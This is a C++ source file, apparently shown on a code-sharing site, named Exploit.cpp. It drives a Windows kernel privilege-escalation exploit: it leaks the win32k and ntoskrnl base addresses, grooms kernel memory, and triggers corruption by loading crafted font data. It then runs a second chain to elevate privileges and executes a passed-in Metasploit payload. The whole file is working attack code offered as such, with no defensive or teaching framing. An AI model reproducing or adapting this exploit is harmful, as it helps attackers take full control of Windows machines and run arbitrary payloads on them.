Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
// Exploit.cpp : Defines the entry point for the console application.
2
//
3
#include <Windows.h>
4

5
#include "Exploit.h"
6
#include "Win32kLeaker.h"
7
#include "Exploiter.h"
8
#include "FontData.h"
9

10
static VOID ExecutePayload(LPVOID lpPayload) 
11
{
12
	VOID(*lpCode)() = (VOID(*)())lpPayload;
13
	lpCode();
14
	return;
15
}
16

17
VOID Exploit(LPVOID lpPayload)
18
{
19
	// Variables.
20
	DWORD cFonts;
21
	PVOID pFontData = (PVOID)fontData;
22
	DWORD ExAllocatePoolWithTag_offset;
23
	ULONGLONG win32kBaseAddr;
24
	ULONGLONG ntBaseAddr;
25

26
	ExploiterInit();
27

28
	// Leak the win32k base address.
29
	win32kBaseAddr = LeakWin32kAddress();
30
	if (win32kBaseAddr == NULL) {
31
		return;
32
	}
33

34
	ExploiterSetupFirstChain(win32kBaseAddr);
35
	ExploiterDoFengShui();
36

37
	// Trigger the memory corruption: Render the font and cause memory overwrite.
38
	cFonts = 0;
39
	HANDLE fh = AddFontMemResourceEx(pFontData, sizeof(fontData), 0, &cFonts);
40
	// Clean up: remove the font from memory.
41
	RemoveFontMemResourceEx(fh);
42

43
	// First Stage: Leak ntoskrnl
44
	ExploiterRunFirstChain();
45
	ntBaseAddr = ExploiterGetNtBase();
46

47
	// Second Stage: elevate privileges
48
	ExploiterSetupSecondChain(win32kBaseAddr, ntBaseAddr);
49
	ExploiterRunSecondChain();
50
	ExpoiterCleanUp();
51

52
	// Exetue msf payload
53
	ExecutePayload(lpPayload);
54
}
55

56

57